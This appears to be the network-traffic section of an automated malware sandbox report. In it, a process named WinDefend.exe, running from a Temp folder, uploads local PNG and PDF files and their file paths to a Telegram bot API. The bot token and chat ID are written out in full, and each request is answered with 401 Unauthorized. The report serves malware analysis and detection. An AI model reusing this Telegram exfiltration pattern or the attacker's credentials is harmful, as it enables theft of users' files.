[=,k{hhVl]Hb\.EQ(EZww}uCodBQ(~x:<Of=5 +eMAQ@w(UK@JOn7\-')Rq{#yP'k)%~Yk^cjxTp;m26!8K-mp3
2024-05-23 13:34:40 UTC	4096	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:
2024-05-23 13:34:40 UTC	1867	OUT	Data Raw: 2c 34 ac 26 ec 79 b8 55 78 7e 78 77 04 2d 62 45 44 43 c4 bb 48 8f c8 d2 c8 47 8b 8d 16 4b 16 77 46 c9 47 c5 45 d5 47 4d 45 7b 45 97 45 4b 97 58 2c 59 b3 e4 46 8c 5a 8c 20 a6 3d 16 1f 1b 15 7b 24 76 72 a9 f7 d2 dd 4b 87 e3 ec e2 0a e3 ee 2e 33 5c 96 b3 ec da 72 b5 e5 a9 cb cf ae 90 5f c1 59 71 2a 1e 1b 1f 1d df 10 ff 89 13 c2 a9 e5 4c ae f4 5f b9 77 e5 04 d7 93 bb 87 fb 92 e7 c6 2b e7 8d f1 5d f8 65 fc 91 04 97 84 b2 84 d1 44 97 c4 5d 89 63 49 ae 49 15 49 e3 02 4f 41 b5 e0 75 b2 5f f2 81 e4 a9 94 90 94 a3 29 33 a9 d1 a9 cd 69 84 b4 f8 b4 d3 42 25 61 8a b0 2b 5d 33 3d 27 bd 2f c3 34 a3 30 43 ba ca 69 d5 ee 55 13 a2 40 d1 91 4c 28 73 59 66 bb 98 8e fe 4c f5 48 8c 24 9b 25 83 59 0b b3 6a b2 de 67 47 65 9f ca 51 cc 11 e6 f4 e4 9a e4 6e cb 1d c9 f3 c9 fb 7e 35 Data Ascii: ,4&yUx~xw-bEDCHGKwFGEGME{EEKX,YFZ ={$vrK.3\r_Yq*L_w+]eD]cIIIOAu_)3iB%a+]3='/40CiU@L(sYfLH$%YjgGeQn~5
2024-05-23 13:34:40 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 65 35 31 38 61 31 61 39 2d 36 63 64 65 2d 34 32 31 63 2d 62 39 61 37 2d 61 31 65 64 62 63 33 30 66 61 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --e518a1a9-6cde-421c-b9a7-a1edbc30fa72Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:40 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:40 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:40 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	61111	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:40 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="426ff023-bd5d-4668-9bf7-e3b45dfa899e" Host: api.telegram.org Content-Length: 13011 Expect: 100-continue
2024-05-23 13:34:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:41 UTC	40	OUT	Data Raw: 2d 2d 34 32 36 66 66 30 32 33 2d 62 64 35 64 2d 34 36 36 38 2d 39 62 66 37 2d 65 33 62 34 35 64 66 61 38 39 39 65 0d 0a Data Ascii: --426ff023-bd5d-4668-9bf7-e3b45dfa899e
2024-05-23 13:34:41 UTC	113	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 63 6c 6f 75 64 5f 72 65 74 69 6e 61 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 63 6c 6f 75 64 5f 72 65 74 69 6e 61 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=ccloud_retina.png; filename*=utf-8''ccloud_retina.png
2024-05-23 13:34:41 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 40 00 00 01 40 08 06 00 00 00 cd 90 a5 aa 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0a eb 00 00 0a eb 01 82 8b 0d 5a 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 20 00 49 44 41 54 78 9c ed 9d 79 b8 65 c3 d5 87 5f d7 2c 08 d1 86 c4 c7 26 a6 10 a4 55 04 21 b4 12 63 0c 89 98 25 31 46 10 24 c6 7c 32 47 10 32 90 01 21 9f 4e 22 88 10 a1 cd 53 50 c4 9c 48 99 e7 d0 5d e6 a1 8d 31 0f c7 f7 47 d5 b9 ae ee 3b df bd 76 ed 73 f6 7a 9f e7 3c 7d 75 df 5e b5 da bd f7 77 6a 57 ad f5 5b 33 bc fb ee bb 28 8a a2 34 91 9e dc 09 28 8a a2 e4 42 05 50 51 94 c6 a2 02 a8 28 4a 63 51 01 54 14 a5 b1 a8 00 2a 8a Data Ascii: PNGIHDR@@sBIT\|dpHYsZtEXtSoftwareAdobe Fireworks CS6 IDATxye_,&U!c%1F$\|2G2!N"SPH]1G;vsz<}u^wjW[3(4(BPQ(JcQT*
2024-05-23 13:34:41 UTC	4096	OUT	Data Raw: 14 ce 3f 81 dc 2e 70 26 62 9f fb a0 94 ba 03 4c 7d a5 97 53 bd d3 c8 af 80 03 73 f8 9e 29 d3 13 ac d9 86 68 22 d1 f4 31 96 9d cc eb c0 a7 d2 59 af 18 c2 bb c0 07 5b ad d6 52 83 dd 01 94 bd 03 fc 21 d5 8a 5f 0b d8 ab 70 7e 3f 15 bf fa 50 38 7f 06 b0 0e ef d9 fd 2b 9d c7 6c c0 19 c1 1a d1 56 48 e1 5d e0 12 3d 3d 3d 83 ea 51 69 02 18 ac 59 9d 38 ce b0 2a 5e 05 36 2d 9c 97 6c b0 56 46 49 e1 fc 8d c4 37 c3 a9 b9 73 51 46 4d bb e6 53 9a 9f 12 1b 15 24 f8 ea 60 7f 58 ca 23 70 b0 66 2e e0 36 60 f1 32 e2 0d 83 97 80 f5 f5 bc af fe 04 6b 96 03 2e a3 7e b6 67 ca f0 68 01 6b a4 37 34 31 82 35 27 01 3b 0a 84 7e 1d 98 bf 70 fe e5 fe fe b0 ac 1d e0 af a9 4e fc a6 02 6b aa f8 75 06 85 f3 77 13 1d 40 6a 3d 3a 40 19 90 1e e0 24 e9 47 61 e0 97 42 71 67 23 8e 83 e8 97 31 ef Data Ascii: ?.p&bL}Ss)h"1Y[R!_p~?P8+lVH]===QiY8*^6-lVFI7sQFMS$`X#pf.6`2k.~ghk7415';~pNkuw@j=:@$GaBqg#1
2024-05-23 13:34:41 UTC	4096	OUT	Data Raw: 90 6c c4 ae 0b 9b 02 7f 12 ee af 1e 90 24 82 07 e5 58 5b a9 0d bf 92 ea f9 ed c3 1e c8 5c 7e c0 00 8f bf f0 7e 3f 40 89 8b 10 a9 76 96 36 13 e9 ac 39 21 a3 65 5b e0 e4 8c 22 f8 0b b4 58 ba a9 4c 01 be 2f b9 40 7a c2 d9 47 28 fc b3 0c 32 b0 a9 af 00 4a 4c 75 ff 44 b0 66 79 81 b8 00 14 ce 3f 05 9c 2d 15 bf 66 6c 4f 5e 11 3c 12 15 c1 a6 d1 02 76 28 9c 7f 85 30 e4 5a 00 00 10 ef 49 44 41 54 55 78 9d ed 80 8f 08 c5 3e 3d d9 e8 f5 4b 5f 01 3c 1b 19 73 d4 1d 04 62 f6 e5 a7 c2 f1 eb 44 1d 44 f0 f0 1c 6b 2b 59 38 b2 70 fe 1a c9 05 82 35 3d c0 ff 0a 2e 31 e8 c5 4d af 00 16 ce 3f 8d 4c 87 c5 0e c1 1a 09 5b 1b 00 0a e7 6f 01 ce 95 8a 5f 43 72 8b e0 f7 68 d6 9b 4e 53 f9 27 f0 a3 0a d6 f9 32 72 ad b3 f7 16 ce 0f 6a 00 3c ed 4c 90 33 04 92 58 10 f8 82 40 dc be 1c 22 1c Data Ascii: l$X[\~~?@v69!e["XL/@zG(2JLuDfy?-flO^<v(0ZIDATUx>=K_<sbDDk+Y8p5=.1M?L[o_CrhNS'2rj<L3X@"
2024-05-23 13:34:41 UTC	385	OUT	Data Raw: c2 f9 7b f3 a6 d3 bd a8 00 0e 41 12 c3 cf 02 9b 10 27 75 2d 9e 37 23 a5 0b 79 98 f7 0b de 7f f2 a6 d3 1c 54 00 47 48 9a d3 ba 0e 71 98 cd 1a c0 52 79 33 52 3a 8c b7 89 c3 b2 da d3 eb ae 2f 9c 0f 79 53 6a 2e 2a 80 63 24 58 f3 41 e0 13 e9 b5 14 b0 04 71 97 38 3f 30 2e 63 6a 4a 7e 5e 25 0e 5c ba 9d 38 9d ee 06 e0 df 9d 32 34 bc 09 cc f0 ee bb 7a 96 aa 28 4a 33 a9 f3 00 72 45 51 14 51 54 00 15 45 69 2c 2a 80 8a a2 34 16 15 40 45 51 1a 8b 0a a0 a2 28 8d 45 05 50 51 94 c6 a2 02 a8 28 4a 63 51 01 54 14 a5 b1 a8 00 2a 8a d2 58 54 00 15 45 69 2c 2a 80 8a a2 34 16 15 40 45 51 1a 8b 0a a0 a2 28 8d 45 05 50 51 94 c6 a2 02 a8 28 4a 63 51 01 54 14 a5 b1 a8 00 2a 8a d2 58 54 00 15 45 69 2c 2a 80 8a a2 34 16 15 40 45 51 1a 8b 0a a0 a2 28 8d 45 05 50 51 94 c6 a2 02 a8 28 Data Ascii: {A'u-7#yTGHqRy3R:/ySj.c$XAq8?0.cjJ~^%\824z(J3rEQQTEi,4@EQ(EPQ(JcQTXTEi,4@EQ(EPQ(JcQTXTEi,4@EQ(EPQ(
2024-05-23 13:34:41 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 34 32 36 66 66 30 32 33 2d 62 64 35 64 2d 34 36 36 38 2d 39 62 66 37 2d 65 33 62 34 35 64 66 61 38 39 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --426ff023-bd5d-4668-9bf7-e3b45dfa899eContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:41 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:41 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 34 32 36 66 66 30 32 33 2d 62 64 35 64 2d 34 36 36 38 2d 39 62 66 37 2d 65 33 62 34 35 64 66 61 38 39 39 65 2d 2d 0d 0a Data Ascii: --426ff023-bd5d-4668-9bf7-e3b45dfa899e--
2024-05-23 13:34:41 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:41 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	61112	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:41 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="eb1ce6c3-ef84-4542-9110-d67001d0014a" Host: api.telegram.org Content-Length: 3183 Expect: 100-continue
2024-05-23 13:34:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:41 UTC	40	OUT	Data Raw: 2d 2d 65 62 31 63 65 36 63 33 2d 65 66 38 34 2d 34 35 34 32 2d 39 31 31 30 2d 64 36 37 30 30 31 64 30 30 31 34 61 0d 0a Data Ascii: --eb1ce6c3-ef84-4542-9110-d67001d0014a
2024-05-23 13:34:41 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 34 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 34 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=48.png; filename*=utf-8''48.png
2024-05-23 13:34:41 UTC	2867	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 0a fa 49 44 41 54 68 81 ed 59 7d 8c 5d 65 99 ff fd 9e f7 3d f7 73 e6 ce 0c ed cc 68 01 6b 15 52 69 97 5a c0 10 89 d9 98 5d 17 11 a8 ba 45 07 51 3e 8c 88 1f 64 cd 46 ab 44 0d 9a bd b0 1a 75 2d 46 76 13 8c 88 66 b7 40 59 67 d4 1a 0c 26 80 28 1a 89 46 64 07 3f 0a 41 61 b7 4a 0b b5 a5 ed 7c cf 9d 73 ce fb 3c fb c7 39 77 be 7a 67 7a a7 83 bb d9 64 9f 9b 37 b9 b9 f7 9c f7 fc 7e cf f3 bc bf e7 79 df 03 fc 1f 37 fe 2f cd 67 2f f2 73 57 65 c4 00 dc 4a 6f 1a 18 84 b3 17 c1 81 ab 9d 80 68 7a 73 10 ae fb 89 ad 9d ed dc 74 e1 de c7 c7 87 86 10 90 dd 4c ae 22 22 ab f6 c0 d9 77 5f da 73 f4 d9 d1 4f a5 71 7a 31 d4 7a 09 9e 20 1a 16 62 ca a1 b3 aa d3 f7 fd b4 f4 f8 17 Data Ascii: PNGIHDR00WIDAThY}]e=shkRiZ]EQ>dFDu-Fvf@Yg&(Fd?AaJ\|s<9wzgzd7~y7/g/sWeJohzstL""w_sOqz1z b
2024-05-23 13:34:42 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 65 62 31 63 65 36 63 33 2d 65 66 38 34 2d 34 35 34 32 2d 39 31 31 30 2d 64 36 37 30 30 31 64 30 30 31 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --eb1ce6c3-ef84-4542-9110-d67001d0014aContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:42 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:42 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 65 62 31 63 65 36 63 33 2d 65 66 38 34 2d 34 35 34 32 2d 39 31 31 30 2d 64 36 37 30 30 31 64 30 30 31 34 61 2d 2d 0d 0a Data Ascii: --eb1ce6c3-ef84-4542-9110-d67001d0014a--
2024-05-23 13:34:42 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:42 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	61113	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:41 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 166 Expect: 100-continue
2024-05-23 13:34:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:42 UTC	166	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 57 6f 72 64 73 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 70 6c 75 67 5f 69 6e 73 25 35 43 41 6e 6e 6f 74 61 74 69 6f 6e 73 25 35 43 53 74 61 6d 70 73 25 35 43 57 6f 72 64 73 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 31 30 39 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+Words.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cplug_ins%5CAnnotations%5CStamps%5CWords.pdf%0ASize%3A+109+KB
2024-05-23 13:34:42 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:42 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	61115	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:42 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 176 Expect: 100-continue
2024-05-23 13:34:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:42 UTC	176	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 43 6c 6f 73 65 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 43 6c 6f 73 65 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 38 39 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+Close.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CClose.png%0ASize%3A+289+B
2024-05-23 13:34:42 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:42 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	61116	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:42 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="86970169-c32b-41e9-af9b-e0233f251799" Host: api.telegram.org Content-Length: 112820 Expect: 100-continue
2024-05-23 13:34:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:43 UTC	40	OUT	Data Raw: 2d 2d 38 36 39 37 30 31 36 39 2d 63 33 32 62 2d 34 31 65 39 2d 61 66 39 62 2d 65 30 32 33 33 66 32 35 31 37 39 39 0d 0a Data Ascii: --86970169-c32b-41e9-af9b-e0233f251799
2024-05-23 13:34:43 UTC	97	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 57 6f 72 64 73 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 57 6f 72 64 73 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=Words.pdf; filename*=utf-8''Words.pdf
2024-05-23 13:34:43 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0a 32 39 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 33 32 20 0d 2f 48 20 5b 20 31 30 31 34 20 32 34 39 20 5d 20 0d 2f 4c 20 31 31 32 34 39 38 20 0d 2f 45 20 31 32 37 36 38 20 0d 2f 4e 20 38 20 0d 2f 54 20 31 31 31 38 30 30 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 72 65 66 0d 32 39 20 32 36 20 0d 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 38 36 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 37 35 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 32 36 33 Data Ascii: %PDF-1.3%29 0 obj<< /Linearized 1 /O 32 /H [ 1014 249 ] /L 112498 /E 12768 /N 8 /T 111800 >> endobj xref29 26 0000000016 00000 n0000000867 00000 n0000000975 00000 n0000001263
2024-05-23 13:34:43 UTC	4096	OUT	Data Raw: f3 f9 da 90 44 35 f0 c9 b1 50 29 65 9c 60 c9 5b 9c 28 d4 f3 3a 1c c8 95 5a cc 23 85 21 99 b2 9c 9e 11 07 62 8b 5b 9c 29 e5 34 52 18 22 d4 d2 c8 c0 14 24 7d 02 e6 9d 1d b1 ac 4c bd f2 22 b5 70 aa ba 0e 47 a6 f0 d7 06 d8 cb ee 8c fe 72 8b 67 6d ae c5 79 d7 ef f5 56 d1 17 8a ce 09 8a 34 5f c1 e9 5c b4 ca 86 38 b5 03 37 75 2a 94 a2 2c 6a 8f 9d da 11 a7 4e 1d c9 e2 47 c4 9b e9 88 e5 6d 14 73 dd 78 2d b6 66 1a e0 85 07 6f d7 f2 2e 20 a0 b9 2a 24 52 4e bc 23 cb 00 8e cc 5e a4 08 f6 b6 5a e5 b1 1b c0 11 ef 77 a3 92 f8 13 b0 0c 60 88 19 a0 53 c9 71 19 c0 c2 65 80 1b 59 06 30 c0 0c 70 67 74 03 58 bc 0c 60 c8 aa 79 42 19 f2 03 79 b6 7f 58 82 99 72 d5 a1 61 12 a8 ff 5e 48 2e 24 3c de c3 42 22 f1 81 20 13 67 47 34 6e 4d ef 40 77 6b 2b 2e 82 1e 15 d5 67 08 78 58 27 90 Data Ascii: D5P)e`[(:Z#!b[)4R"$}L"pGrgmyV4_\87u,jNGmsx-fo. $RN#^Zw`SqeY0pgtX`yByXra^H.$<B" gG4nM@wk+.gxX'
2024-05-23 13:34:43 UTC	4096	OUT	Data Raw: f6 36 d8 5e 6d d0 dd 1a ae 02 9c d0 0e d0 db 5c e5 3e 21 96 a2 53 53 86 33 07 4c 28 cd cb 3a 74 00 99 de ce 94 fb 09 b9 83 d3 d4 f7 d3 02 28 da e1 e1 b4 f6 64 f6 2d e6 87 06 48 48 2a 70 9b 60 96 29 ed 0c 7e 41 5d 4c 89 d2 7d 42 21 19 ec 54 e6 c8 61 d5 f9 5e 99 9f ba bb 8f e2 c6 2a 03 c6 9d 4a 22 e5 87 1b 52 e9 f5 3d 95 d9 66 e5 c8 ce 6e f7 d5 9c d7 8d 66 59 e1 12 75 43 3d 96 a2 83 2c e0 40 43 de 75 81 14 1b 86 79 27 83 46 20 dc cd 07 cb 08 fd d0 08 03 6a 87 5a f3 65 98 e2 4e c8 5e 04 ec ab aa be 79 9a 8a 54 f4 0d 85 f5 7d 1f 46 bf 2f 33 b5 2e e4 28 aa 4b c1 58 06 24 05 1c e8 0c 7e 1e f2 46 26 6b 16 4c ea 0c 86 b7 37 7a 31 a4 e3 bc 53 63 e7 bd 65 9d 6c 79 ba 17 75 ca 6e 18 8a 8e a2 47 95 6d f3 32 4c 86 13 2e 36 2c a9 65 af 4c ad 94 c2 4f 54 d9 92 f7 f3 c0 Data Ascii: 6^m\>!SS3L(:t(d-HHp`)~A]L}B!Ta^J"R=fnfYuC=,@Cuy'F jZeN^yT}F/3.(KX$~F&kL7z1ScelyunGm2L.6,eLOT
2024-05-23 13:34:43 UTC	4096	OUT	Data Raw: e8 ae 03 95 30 ff 9a 6d 1a ef 17 4b db d9 e6 c2 f9 2a 31 2c ee 87 ba 01 67 4b 25 7c 61 42 78 ee 2f 95 82 2d 23 a7 f2 92 fd 5b ff 34 69 16 e5 4a bb fc 13 04 0a 75 6e 8f 29 87 3e 2b 24 d1 33 a2 69 12 6f 39 1e e1 12 3c 31 28 dc 7b dc 02 ba 84 d7 e6 66 e0 0a 78 b0 d5 9b 61 44 87 32 ef b8 c9 5c 25 ce 27 5f ab 13 e3 8e e3 1a 94 d9 9f cc e3 85 e1 3b a0 57 56 be 17 37 f3 cc 9b 0c 23 2c be a9 d2 f0 2a f2 9c 96 b9 f0 91 e2 b9 cf 93 79 dc 4c e3 cb d9 de 98 c6 eb ce e7 67 ea 88 00 c5 db 7a e3 26 d6 ec 7c a0 92 a9 72 e6 c4 4f 09 7e 23 be 21 f2 9b 57 e6 ca 0a 33 db bc 8b 5e 30 55 e5 a3 19 cc c0 fd 1d 91 e1 22 1c af 2d 9b 45 b1 b5 02 3b af 07 70 e7 76 81 eb 8c 21 17 5e 79 0b a6 ad 8c 08 0d c0 7d da 0b c6 70 70 47 8e 5b e5 c0 dd eb ed 5c 4b c3 0f d2 2b c3 07 65 3c 19 e2 Data Ascii: 0mK1,gK%\|aBx/-#[4iJun)>+$3io9<1({fxaD2\%'_;WV7#,yLgz&\|rO~#!W3^0U"-E;pv!^y}ppG[\K+e<
